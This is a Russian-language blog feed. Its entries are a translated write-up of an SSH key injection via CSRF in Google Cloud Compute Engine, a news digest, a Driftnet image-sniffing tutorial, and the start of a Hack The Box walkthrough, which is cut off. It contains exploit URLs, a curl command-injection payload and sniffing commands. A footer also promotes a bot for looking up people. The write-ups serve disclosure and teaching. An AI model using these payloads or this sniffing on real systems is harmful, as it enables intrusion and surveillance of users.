<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>the Matrix</title><author><name>the Matrix</name></author><id>https://teletype.in/atom/matrix_supp</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/matrix_supp?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/matrix_supp?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-05T08:11:18.498Z</updated><entry><id>matrix_supp:fYmdCS_UCD4</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/fYmdCS_UCD4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Как сделать инъекцию SSH ключа в Google Cloud Compute Engine</title><published>2023-01-22T08:09:56.735Z</published><updated>2023-01-22T08:09:56.735Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/5b/c9/5bc9d646-ceeb-470d-8051-b74d51fb4b85.png"></media:thumbnail><category term="utechki" label="Утечки"></category><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/a8/8f/a88f3ac2-227a-4b71-86f7-922f9916b1e4.jpeg&quot;&gt;После постоянного поиска ошибок в обычных приложениях Google, таких как Drive, мы захотели перейти в Google Cloud. Это была первая уязвимость, которую мы обнаружили на платформе и которая привела к RCE в один клик в инстансе Compute Engine пользователя-жертвы.</summary><content type="html">
  &lt;figure id=&quot;z5Hk&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a8/8f/a88f3ac2-227a-4b71-86f7-922f9916b1e4.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XyR7&quot;&gt;После постоянного поиска ошибок в обычных приложениях Google, таких как Drive, мы захотели перейти в Google Cloud. Это была первая уязвимость, которую мы обнаружили на платформе и которая привела к RCE в один клик в инстансе Compute Engine пользователя-жертвы.&lt;/p&gt;
  &lt;p id=&quot;Gkg7&quot;&gt;Это были наши первые шаги в Google Cloud и мы, естественно, наткнулись на один из самых популярных продуктов — Compute Engine. Изучая его возможности и то, как он работает, я заметил &lt;em&gt;«SSH-in-browser». &lt;/em&gt;Это функция в GCP, которая позволяет пользователям получать доступ к своим инстансам в браузере через SSH. Визуально этот интерфейс очень похож на Cloud Shell.&lt;/p&gt;
  &lt;figure id=&quot;7AQB&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://blog.stazot.com/content/images/2023/01/image.png&quot; width=&quot;958&quot; /&gt;
    &lt;figcaption&gt;SSH-консоль в браузере&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;PMrK&quot;&gt;Я рассматривал различные функции и опции SSH-in-browser и моё внимание привлекла возможность изменить имя пользователя&lt;em&gt;. &lt;/em&gt;&lt;/p&gt;
  &lt;figure id=&quot;GFKy&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://blog.stazot.com/content/images/2023/01/image-1.png&quot; width=&quot;963&quot; /&gt;
    &lt;figcaption&gt;Получение ввода имени пользователя от пользователя&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ZrJe&quot;&gt;В этом диалоговом окне вводится имя пользователя, которое затем передается на сервер через GET параметр &lt;code&gt;newLinuxUsername&lt;/code&gt;. Даже если указанное имя пользователя не существует, он создаст нового пользователя с указанным именем и зарегистрирует вас как этого пользователя.&lt;/p&gt;
  &lt;pre id=&quot;GFfQ&quot;&gt;https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername={USERNAME}
&lt;/pre&gt;
  &lt;p id=&quot;t3Ga&quot;&gt;Поскольку не было &lt;em&gt;никакого рандомного токена или защиты от CSRF&lt;/em&gt;, любой мог создать ссылку и отправить ее пользователю Compute Engine, чтобы создать нового пользователя в его экземпляре. Не очень впечатляюще, но есть на что обратить внимание. Но самое интересное заключалось в том, что, по крайней мере, на первый взгляд, это выглядело так, как будто он просто принимал пользовательский ввод и передавал его в &lt;code&gt;useradd&lt;/code&gt; или &lt;code&gt;adduser&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;OriS&quot;&gt;Я попытался добавить полезные нагрузки, такие как &lt;code&gt;&amp;#x60;whoami&amp;#x60;&lt;/code&gt;, &lt;code&gt;$(whoami)&lt;/code&gt;, чтобы увидеть, будут ли они выполнены. Однако ничего не произошло. Чтобы проверить инъекцию команды второго порядка, я попробовал &lt;code&gt;&amp;#x60;curl https://stazot.com&amp;#x60;&lt;/code&gt; в качестве полезной нагрузки. И снова ничего не произошло. Я вернулся на страницу инстанса Compute Engine и начал искать другие вещи.&lt;/p&gt;
  &lt;p id=&quot;agC0&quot;&gt;Я заметил, что в разделе «Ключи SSH» были перечислены имена пользователей, которые я использовал в качестве полезной нагрузки. Этот раздел содержит список всех пользователей и их соответствующие добавленные или сгенерированные SSH-ключи. В то время как полезные нагрузки, такие как &lt;code&gt;&amp;#x60;whoami&amp;#x60;&lt;/code&gt; были отображены как есть, полезная нагрузка &lt;code&gt;curl&lt;/code&gt; была указана странным образом.&lt;/p&gt;
  &lt;figure id=&quot;L9tO&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://blog.stazot.com/content/images/2023/01/image-5.png&quot; width=&quot;949&quot; /&gt;
    &lt;figcaption&gt;SSH-ключи экземпляра&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4rex&quot;&gt;Поле имени пользователя содержало &lt;code&gt;&amp;#x60;curl http&lt;/code&gt;, а поле SSH ключа содержало &lt;code&gt;stazot.com&amp;#x60;:ssh-key-value&lt;/code&gt; В тот же миг в моей голове зазвенели колокольчики.&lt;/p&gt;
  &lt;p id=&quot;hXTE&quot;&gt;Сервер использовал символ двоеточия &lt;code&gt;:&lt;/code&gt;в качестве разделителя. Всё, что до &lt;code&gt;:&lt;/code&gt;считалось именем пользователя, а все после &lt;code&gt;:&lt;/code&gt; считалось SSH-ключом для этого пользователя. Теоретически, это должно позволить злоумышленнику ввести имя пользователя и свой открытый SSH-ключ. Это возможно, потому что, как отмечалось ранее, сервер принимает этот ввод в GET запросе и не имеет защиты от CSRF.&lt;/p&gt;
  &lt;p id=&quot;0mfM&quot;&gt;Таким образом, если заставить жертву открыть вредоносную ссылку, то добавится имя пользователя и SSH-ключ злоумышленника. Чтобы проверить уязвимость, я создал следующий URL-адрес с &lt;code&gt;attacker:{URL-ENCODED-SSH-PUBLIC-KEY}&lt;/code&gt; в качестве полезной нагрузки:&lt;/p&gt;
  &lt;pre id=&quot;fSJX&quot;&gt;https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername=attacker:{URL-ENCODED-SSH-PUBLIC-KEY}
&lt;/pre&gt;
  &lt;p id=&quot;sif4&quot;&gt;Открыл ссылку как жертва — и попытался войти в инстанс как злоумышленник. Однако это не сработало. Причина заключалась в том, что добавленный мной SSH-ключ был добавлен к SSH-ключу, сгенерированному Google в серверной части. Чтобы исправить это, я добавил символы возврата строки к полезной нагрузке:&lt;/p&gt;
  &lt;pre id=&quot;Tv9d&quot;&gt;https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername=attacker:{URL-ENCODED-SSH-PUBLIC-KEY}%0d%0a
&lt;/pre&gt;
  &lt;p id=&quot;m3qW&quot;&gt;Как только жертва открыла эту ссылку, я попытался войти в этот инстанс как злоумышленник — и это сработало! Я вошел в систему на целевой машине с правами sudo.&lt;/p&gt;
  &lt;p id=&quot;6Dzc&quot;&gt;Вот видео, демонстрирующее атаку:&lt;/p&gt;
  &lt;figure id=&quot;S5k9&quot; class=&quot;m_custom&quot;&gt;
    &lt;iframe src=&quot;https://www.youtube-nocookie.com/embed/fOP-LwViRvA?autoplay=0&amp;controls=1&amp;wmode=opaque&amp;rel=0&amp;egm=0&amp;iv_load_policy=3&amp;hd=0&quot;&gt;&lt;/iframe&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;E2Re&quot;&gt;Почему существовала эта ошибка?&lt;/h3&gt;
  &lt;p id=&quot;XoSV&quot;&gt;Это поведение существовало для облегчения авторизации через функцию SSH-in-browser. Поскольку браузер действует как SSH-клиент, для входа в инстанс ему требуется авторизованный SSH-ключ.&lt;/p&gt;
  &lt;p id=&quot;b0Ad&quot;&gt;Compute Engine обрабатывает это, создавая SSH-ключ для каждого пользователя в экземпляре (который использует SSH-in-browser) и сохраняет его в метаданных. Когда пользователь входит в систему с помощью SSH-in-browser, инстанс извлекает все авторизованные SSH-ключи с сервера метаданных и регистрирует пользователя.&lt;/p&gt;
  &lt;p id=&quot;KfqO&quot;&gt;Это очень сложный процесс, который подробно описан &lt;a href=&quot;https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/red-team-tech-notes/-/tree/master/oslogin-privesc-june-2020#how-os-login-works&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;NztL&quot;&gt;&lt;a href=&quot;https://blog.stazot.com/ssh-key-injection-google-cloud/&quot; target=&quot;_blank&quot;&gt;Оригинал на английском тут.&lt;/a&gt;&lt;/blockquote&gt;

</content></entry><entry><id>matrix_supp:5xSs6nwAOv5</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/5xSs6nwAOv5?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Новости кибербеза #1</title><published>2022-11-18T23:43:30.726Z</published><updated>2022-11-18T23:43:30.726Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/a0/3a/a03a57da-37c5-44f7-b6a9-5771f7ce7211.png"></media:thumbnail><summary type="html">​🛡Как за $20 взломать сотни IT-компаний мира</summary><content type="html">
  &lt;p id=&quot;je7Y&quot;&gt;​&lt;a href=&quot;tg://emoji?id=5818967120213445821&amp;t=0&quot; target=&quot;_blank&quot;&gt;🛡&lt;/a&gt;&lt;a href=&quot;https://telegra.ph/file/53f2430f4fd10bc18ad99.jpg&quot; target=&quot;_blank&quot;&gt;Как&lt;/a&gt; за $20 взломать сотни IT-компаний мира&lt;/p&gt;
  &lt;p id=&quot;a9Qr&quot;&gt;Исследователи из ИБ-компании Checkmarx выяснили подробности продолжающейся атаки на цепочку поставок, которая использует вредоносные PyPI-пакеты для распространения вредоносного ПО W4SP Stealer , и на сегодняшний день жертвами злоумышленников стали более 100 жертв. По словам эксперта Checkmarx Йоссефа Харуш, кибепреступник по-прежнему активен и выпускает новые вредоносные пакеты. Харуш назвал злоумышленника «WASP».&lt;/p&gt;
  &lt;p id=&quot;Zbps&quot;&gt;&lt;a href=&quot;https://telegra.ph/Kak-za-20-vzlomat-sotni-IT-kompanij-mira-11-18-3&quot; target=&quot;_blank&quot;&gt;🧑🏻‍💻Читать далее&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;CmOP&quot;&gt;&lt;a href=&quot;tg://emoji?id=5818967120213445821&amp;t=1&quot; target=&quot;_blank&quot;&gt;🛡&lt;/a&gt;В Госдуму внесли законопроект о конфискации имущества у киберпреступников&lt;/p&gt;
  &lt;p id=&quot;Lxt4&quot;&gt;Законопроектом предлагается дополнить пункт «а» части 1 статьи 104.1 («Конфискация имущества») Уголовного кодекса РФ статьями 272—274.1. Это даст возможность конфисковывать имущество, полученное в результате неправомерного доступа к компьютерной информации (статья 272), создания, использования и распространения вредоносных программ (статья 273), нарушения правил эксплуатации, средств хранения, обработки или передачи компьютерной информации (статья 274) и неправомерного воздействия на критическую информационную инфраструктуру РФ (статья 274.1).&lt;/p&gt;
  &lt;p id=&quot;9tOB&quot;&gt;&lt;a href=&quot;https://telegra.ph/V-Gosdumu-vnesli-zakonoproekt-o-konfiskacii-imushchestva-u-kiberprestupnikov-11-18-4&quot; target=&quot;_blank&quot;&gt;📖Прочитать&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;8c58&quot;&gt;&lt;a href=&quot;tg://emoji?id=5818865088970362886&amp;t=2&quot; target=&quot;_blank&quot;&gt;❕&lt;/a&gt;МИД РФ предупредил о том, что мобильные устройства россиян могут прослушиваться на территории ЕС&lt;/p&gt;
  &lt;p id=&quot;X0zX&quot;&gt;Иван Нечаев, замглавы департамента информации и печати Министерства иностранных дел РФ, во время общения с журналистами заявил, что мобильные устройства граждан России, которые на данный момент пребывают на территории Европейского союза, могут быть прослушаны третьими лицами, сообщают «Известия».&lt;/p&gt;
  &lt;p id=&quot;li6v&quot;&gt;&lt;a href=&quot;https://telegra.ph/MID-RF-predupredil-o-tom-chto-mobilnye-ustrojstva-rossiyan-mogut-proslushivatsya-na-territorii-ES-11-18&quot; target=&quot;_blank&quot;&gt;🧑🏻‍💻Подробности&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;PPVg&quot;&gt;&lt;a href=&quot;https://t.me/+xVHYNEkExnJiYjEy&quot; target=&quot;_blank&quot;&gt;𝚝𝚑𝚎 𝚖𝚊𝚝𝚛𝚒𝚡&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>matrix_supp:Perehvat-izobrazhenij-v-lokalnoj-seti-s-pomoshchyu-Driftnet-10-12</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/Perehvat-izobrazhenij-v-lokalnoj-seti-s-pomoshchyu-Driftnet-10-12?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Перехват изображений в локальной сети с помощью Driftnet</title><published>2022-10-12T09:10:40.641Z</published><updated>2022-10-12T09:10:40.641Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/ec/28/ec28c9b1-5c47-4217-9595-8baca63c4291.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/d9/49/d9496cee-a851-4e00-9356-f54206621596.png&quot;&gt;Мы уже рассказывали, как используя Wireshark перехватить трафик. Каким бы хорошим ни был Wireshark, его нельзя использовать для перехвата изображений, передаваемых по сети. Далее рассмотрим инструмент Driftnet, с помощью которого попробуем перехватить изображения в локальной сети.</summary><content type="html">
  &lt;figure id=&quot;coub&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d9/49/d9496cee-a851-4e00-9356-f54206621596.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;FhDi&quot;&gt;Мы уже рассказывали, &lt;a href=&quot;https://spy-soft.net/capture-traffic-wireshark/&quot; target=&quot;_blank&quot;&gt;как используя Wireshark перехватить трафик&lt;/a&gt;. Каким бы хорошим ни был Wireshark, его нельзя использовать для перехвата изображений, передаваемых по сети. Далее рассмотрим инструмент Driftnet, с помощью которого попробуем перехватить изображения в локальной сети.&lt;/p&gt;
  &lt;p id=&quot;U1h3&quot;&gt;Еще по теме: &lt;a href=&quot;https://spy-soft.net/arp-harvesting-arp-cache-poisoning/&quot; target=&quot;_blank&quot;&gt;Сетевая разведка и перехват трафика с помощью ARP&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;Awnl&quot;&gt;Driftnet – это инструмент, который может прослушивать сетевой трафик и перехватывать изображения из TCP потока. В новой бета версии добавлена возможность перехвата видео в формате MPEG и аудио в различных форматах.&lt;/p&gt;
  &lt;p id=&quot;Nszi&quot;&gt;Но как Дрифтнет перехватывает эти изображения? Эти изображения передаются по сети без какого-либо шифрования. Следовательно, Driftnet может их перехватить.&lt;/p&gt;
  &lt;p id=&quot;Z0XQ&quot;&gt;&lt;strong&gt;Перехват изображений в локальной сети с помощью Driftnet&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;cWkp&quot;&gt;Для этого урока нам понадобится любая программа, которая передает изображений по сети. Я буду использовать Netop Vision Pro. Как следует из названия, это ПО для управления классом, используемое для дистанционного обучения. Программа состоит из двух частей:&lt;/p&gt;
  &lt;ul id=&quot;ErZn&quot;&gt;
    &lt;li id=&quot;mikA&quot;&gt;Модуль «Учитель»&lt;/li&gt;
    &lt;li id=&quot;fblL&quot;&gt;Модуля «Студент»&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;COho&quot;&gt;Модуль «Учитель» устанавливается на одну систему, а модуль «Ученик» — на всех контролируемых системах. Компьютер, на котором запущен модуль «Учитель», имеет полный контроль над компьютером, на котором запущен модуль «Ученик», а у ученика нет или очень ограниченная роль.&lt;/p&gt;
  &lt;p id=&quot;4PSs&quot;&gt;Самая важная деталь – учитель может просматривать рабочий стол учащегося. Это функция нам нужна для перехвата изображений передаваемых по сети.&lt;/p&gt;
  &lt;p id=&quot;RDUS&quot;&gt;&lt;strong&gt;Создание стенда для перехвата изображений&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;eHpi&quot;&gt;Для демонстрации работы Driftnet, нам понадобятся:&lt;/p&gt;
  &lt;ul id=&quot;RmeI&quot;&gt;
    &lt;li id=&quot;F1EM&quot;&gt;Системы Windows с модулем Netop Vision. На одной будет установлен модуль Netop Vision Teacher, а на другой Student.&lt;/li&gt;
    &lt;li id=&quot;NOxO&quot;&gt;Kali Linux, которая является атакующей системой и используется для перехвата изображений.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;Установка-Netop-Vision-Student&quot;&gt;Установка Netop Vision Student&lt;/h3&gt;
  &lt;p id=&quot;mEUe&quot;&gt;Сначала настроим лабораторию. Скачаем и установим Netop Vision.&lt;/p&gt;
  &lt;p id=&quot;T2HG&quot;&gt;После завершения установки, перезагрузим все компьютеры и добавим системы с установленным модулем «Ученик» в главный командующий модуль «Учитель»&lt;/p&gt;
  &lt;p id=&quot;YuuI&quot;&gt;Теперь нам понадобиться Kali Linux. Вы можете &lt;a href=&quot;https://spy-soft.net/kali-linux-live-usb-persistence/&quot; target=&quot;_blank&quot;&gt;установить Kali Linux на флешку&lt;/a&gt; или использовать &lt;a href=&quot;https://spy-soft.net/kali-linux-windows-10/&quot; target=&quot;_blank&quot;&gt;Kali Linux на Windows под WSL&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;0OML&quot;&gt;Стенд готов.&lt;/p&gt;
  &lt;h3 id=&quot;Установка-и-использование-Driftnet-для-перехвата-изображения&quot;&gt;Установка и использование Driftnet для перехвата изображения&lt;/h3&gt;
  &lt;p id=&quot;65MR&quot;&gt;Теперь установим Driftnet на Kali Linux:&lt;/p&gt;
  &lt;p id=&quot;ZCOr&quot;&gt;1sudo apt-get install driftnet&lt;/p&gt;
  &lt;p id=&quot;TM5d&quot;&gt;Проверьте имя сетевого интерфейса.&lt;/p&gt;
  &lt;p id=&quot;0bbd&quot;&gt;1ip a&lt;/p&gt;
  &lt;p id=&quot;Suhn&quot;&gt;Теперь все, что нужно сделать, это запустить Driftnet на выбранном интерфейсе.&lt;/p&gt;
  &lt;p id=&quot;GCES&quot;&gt;1sudo driftnet -i eth0&lt;/p&gt;
  &lt;p id=&quot;ex3Z&quot;&gt;Откроется небольшое окно, как показано ниже.&lt;/p&gt;
  &lt;p id=&quot;1vK5&quot;&gt;Снимки экрана компьютера получает модуль учителя, через регулярные короткие промежутки времени. Когда вы развернете окно, вы увидите передаваемые изображения рабочего стола ученика.&lt;/p&gt;
  &lt;figure id=&quot;kuQO&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/72/43/7243932d-daa2-41de-aeb6-9be0339a8cb3.jpeg&quot; /&gt;
    &lt;figcaption&gt;Захват изображений из сетевого трафика&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;SzXm&quot;&gt;&lt;strong&gt;Параметры и аргументы Driftnet:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;IFp0&quot;&gt;
    &lt;li id=&quot;5TUN&quot;&gt;-h – отображает справку.&lt;/li&gt;
    &lt;li id=&quot;Cx10&quot;&gt;-b – сигнализирует при захвате нового изображения.&lt;/li&gt;
    &lt;li id=&quot;eWPg&quot;&gt;-i – выбор интерфейса для прослушивания (по умолчанию используются все интерфейсы).&lt;/li&gt;
    &lt;li id=&quot;4FBa&quot;&gt;-f файл – открывает сохраненные захваченные пакеты из дампа файла pcap.&lt;/li&gt;
    &lt;li id=&quot;tRoI&quot;&gt;-a – не выводит изображения на экране, а только сохраняет их во временную директорию и отображает имена в стандартном выводе.&lt;/li&gt;
    &lt;li id=&quot;Mywj&quot;&gt;-m количество – максимальное количество перехваченных изображений для хранения во временной директории в режиме-a.&lt;/li&gt;
    &lt;li id=&quot;0se4&quot;&gt;-d директория – устанавливает временную директорию.&lt;/li&gt;
    &lt;li id=&quot;Gfqz&quot;&gt;-x префикс – префикс для использования во время сохранения изображений.&lt;/li&gt;
    &lt;li id=&quot;rvcb&quot;&gt;-s – вместе с изображениями пытаться извлечь потоковое аудио из сети.&lt;/li&gt;
    &lt;li id=&quot;8x9C&quot;&gt;-S – перехватывает только потоковое аудио.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;ArL6&quot;&gt;На этом все. Вот так можно перехватить изображения в локальной сети.&lt;/p&gt;
  &lt;p id=&quot;kbs0&quot;&gt;&lt;strong&gt;РЕКОМЕНДУЕМ:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;fXMt&quot;&gt;
    &lt;li id=&quot;OhM4&quot;&gt;&lt;a href=&quot;https://spy-soft.net/intercept-traffic-with-http-toolkit/&quot; target=&quot;_blank&quot;&gt;Перехват трафика с помощью HTTP Toolkit&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;Du3X&quot;&gt;&lt;a href=&quot;https://spy-soft.net/stp-root-hijacking/&quot; target=&quot;_blank&quot;&gt;Использование STP Root Hijacking для перехвата трафика&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;qRbq&quot;&gt;&lt;a href=&quot;https://spy-soft.net/sniffing-images-in-network-driftnet/&quot; target=&quot;_blank&quot;&gt;Источник&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;LH1L&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Hw9U&quot;&gt;&lt;strong&gt;Наши проекты:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;xWeC&quot;&gt;- Кибер новости: &lt;a href=&quot;https://t.me/matrixleaked&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;the Matrix&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Хакинг: &lt;a href=&quot;https://t.me/+bby6PJAbqpNhOWZh&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;/me Hacker&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Кодинг: &lt;a href=&quot;https://t.me/+zBgEm0olmpxlMzA6&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Minor Code&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;👁 Пробить человека? Легко через нашего бота: &lt;a href=&quot;https://t.me/iprobivator_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Мистер Пробиватор&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>matrix_supp:Vzlom-udalennogo-hosta-cherez-Git-i-privilegii-s-GTFO-Bins-10-11</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/Vzlom-udalennogo-hosta-cherez-Git-i-privilegii-s-GTFO-Bins-10-11?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Взлом удаленного хоста через Git и привилегии с GTFOBins</title><published>2022-10-11T10:34:35.695Z</published><updated>2022-10-11T10:34:35.695Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/3b/5a/3b5ab1b0-7c5a-4b35-93ea-df9e83734287.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/56/bc/56bcb842-7ebc-479f-ba33-1c922dd7d978.png&quot;&gt;В этой статье рассмотрим прохождение уязвимой машины OpenSource Hack The Box, в рамках которой будем взламывать удаленных хост через Git и поднимать привилегии используя одну из техник GTFOBins,</summary><content type="html">
  &lt;figure id=&quot;z3qk&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/56/bc/56bcb842-7ebc-479f-ba33-1c922dd7d978.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ZgTv&quot;&gt;В этой статье рассмотрим прохождение уязвимой машины OpenSource Hack The Box, в рамках которой будем взламывать удаленных хост через Git и поднимать привилегии используя одну из техник GTFOBins,&lt;/p&gt;
  &lt;p id=&quot;kNuv&quot;&gt;Еще по теме: &lt;a href=&quot;https://spy-soft.net/hack-wordpress/&quot; target=&quot;_blank&quot;&gt;Как взломать сайт WordPress&lt;/a&gt;&lt;br /&gt;Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация. &lt;strong&gt;Взлом удаленного хоста через Git и привилегии с GTFOBins&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;3FZm&quot;&gt;Взлом веб-сервера на PHP&lt;/p&gt;
  &lt;p id=&quot;UgPq&quot;&gt;Для начала до­бав­им IP-адрес машины в /etc/hosts:&lt;/p&gt;
  &lt;p id=&quot;IsAD&quot;&gt;110.10.11.164 opensource.htb&lt;/p&gt;
  &lt;p id=&quot;gT06&quot;&gt;Начнем со сканирования портов. Это стан­дар­тная операция при любом пентесте. Сканирование портов позволит определить, какие служ­бы на машине при­нима­ют соеди­нение.&lt;/p&gt;
  &lt;p id=&quot;Wq4R&quot;&gt;Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит резуль­таты сканирования:&lt;/p&gt;
  &lt;p id=&quot;XTHJ&quot;&gt;123#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d &amp;#x27;/&amp;#x27; -f 1 | tr &amp;#x27;\n&amp;#x27; &amp;#x27;,&amp;#x27; | sed s/,$//)nmap -p$ports -A $1&lt;/p&gt;
  &lt;p id=&quot;LEx4&quot;&gt;Он дей­ству­ет в два эта­па. Пер­вый про­изво­дит­ просто быс­трое ска­ниро­вание, вто­рой — глубокое ска­ниро­вание, используя име­ющиеся скрип­ты (опция—A)&lt;/p&gt;
  &lt;figure id=&quot;vaM8&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e2/44/e244451c-606a-4ce5-9201-911411ad41f2.png&quot; /&gt;
    &lt;figcaption&gt;Результат работы скрипта&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;YzNJ&quot;&gt;Сканер смог найти только два откры­тых пор­та:&lt;/p&gt;
  &lt;ul id=&quot;Pit5&quot;&gt;
    &lt;li id=&quot;dyFM&quot;&gt;&lt;strong&gt;22&lt;/strong&gt; — служ­ба OpenSSH 7.6p1&lt;/li&gt;
    &lt;li id=&quot;bA9C&quot;&gt;&lt;strong&gt;80&lt;/strong&gt; — веб‑сер­вер Python Werkzeug 2.1.2; а&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Ioic&quot;&gt;Так­же филь­тру­ющийся порт 3000. Взглянем на веб-сервер.&lt;/p&gt;
  &lt;figure id=&quot;xL5j&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e0/c5/e0c57bb1-f87c-4c74-97f9-70ee0992f4af.png&quot; /&gt;
    &lt;figcaption&gt;Глав­ная стра­ница HTB&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ZtLK&quot;&gt;Находим ссыл­ку на фай­л. Исходя из названия можно догадаться, что это какой-то исходный код.&lt;/p&gt;
  &lt;figure id=&quot;X1ob&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b0/76/b0761e33-b56c-4ebc-b23b-9d3243d642cc.png&quot; /&gt;
    &lt;figcaption&gt;Ска­чивание архива&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;MDaF&quot;&gt;В архи­ве лежит каталог .git, который стоит изучить.&lt;/p&gt;
  &lt;figure id=&quot;Xxfv&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b3/34/b3349630-82eb-43c0-8bb0-82d0184b7317.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое скаченного архи­ва&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;y2gm&quot;&gt;Рас­паковываем его и заходим в директорию, содер­жащую репози­торий Git. Пос­ле чего расмотрим сущес­тву­ющие вет­ки.&lt;/p&gt;
  &lt;p id=&quot;tkN8&quot;&gt;1git branch&lt;/p&gt;
  &lt;figure id=&quot;Pwct&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/17/27/1727062b-9ed7-4cbb-bced-5d2499b172e6.png&quot; /&gt;
    &lt;figcaption&gt;Вет­ки Git-репози­тория&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;38Ps&quot;&gt;Далее получаем исто­рию ком­митов. Рассмотрим ее получше.&lt;/p&gt;
  &lt;p id=&quot;7aFT&quot;&gt;1git log dev&lt;/p&gt;
  &lt;figure id=&quot;DUeG&quot;&gt;
